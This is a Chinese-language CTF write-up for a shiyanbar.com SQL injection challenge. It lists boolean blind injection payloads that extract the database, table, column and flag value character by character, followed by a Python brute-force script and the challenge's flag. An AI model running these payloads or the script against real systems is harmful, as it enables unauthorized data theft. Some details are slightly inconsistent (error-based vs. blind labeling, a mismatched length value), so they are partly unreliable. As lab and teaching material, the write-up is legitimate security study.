类型:web
网址:http://www.shiyanbar.com/ctf/1909
攻击:sql注入
一句话总结:
id报错注入(手工)
猜数据库名的长度:
id=1' and length(database())=4 -- 1
数据库名的长度是4
猜数据库名(burpsuite):
id=1' and ascii(mid(database(),1,1))=119 -- 1
id=1' and ascii(mid(database(),2,1))=101 -- 1
id=1' and ascii(mid(database(),3,1))=98 -- 1
id=1' and ascii(mid(database(),4,1))=49 -- 1
数据库名是web1
猜数据表的个数:
id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 -- 1
数据表的个数是2
猜第一个数据表名的长度:
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4 -- 1
第一张数据表名的长度是4
猜第一个数据表名:
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1))=1 -- 1 // 102 f
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),2,1))=1 -- 1 // 108 l
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),3,1))=1 -- 1 // 97 a
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),4,1))=1 -- 1 // 103 g
第一个数据表名称是flag
猜测flag表字段数量:
1' and (select 1 from flag order by 2) -- 1 // 说明只有1个字段
猜测flag表字段的长度:
1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1))=3 -- 1
flag表字段的长度是4
猜测字段名称:
1' and ascii(mid(((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)),1,1))=3 -- 1 // 102 f
1' and ascii(mid(((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)),2,1))=3 -- 1 // 108 l
1' and ascii(mid(((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)),3,1))=3 -- 1 // 97 a
1' and ascii(mid(((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1)),4,1))=3 -- 1 // 103 g
表flag的字段名是flag
猜测数据:
几行数据:
1' and (select count(*) from flag)=1 -- 1 // 1行
数据的长度:
1' and length((select flag from flag limit 1)) =1 -- 1 // 26
猜数据:
1' and ascii(mid((select flag from flag limit 1),1,1)) =3 -- 1
猜数据python3脚本:
import requests
str1 = 'Hello'
data = ''
for i in range(1,27):
for j in range(0,128):
url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(mid((select flag from flag limit 1),%s,1)) =%s -- 1"%(i, j)
r = requests.get(url).content
#print(key)
if str1 in r.decode():
data += chr(j)
print(chr(j))
break
print(data)
FLAG
flag{Y0u_@r3_5O_dAmn_90Od}
参考
https://blog.csdn.net/sinat_41380394/article/details/81544700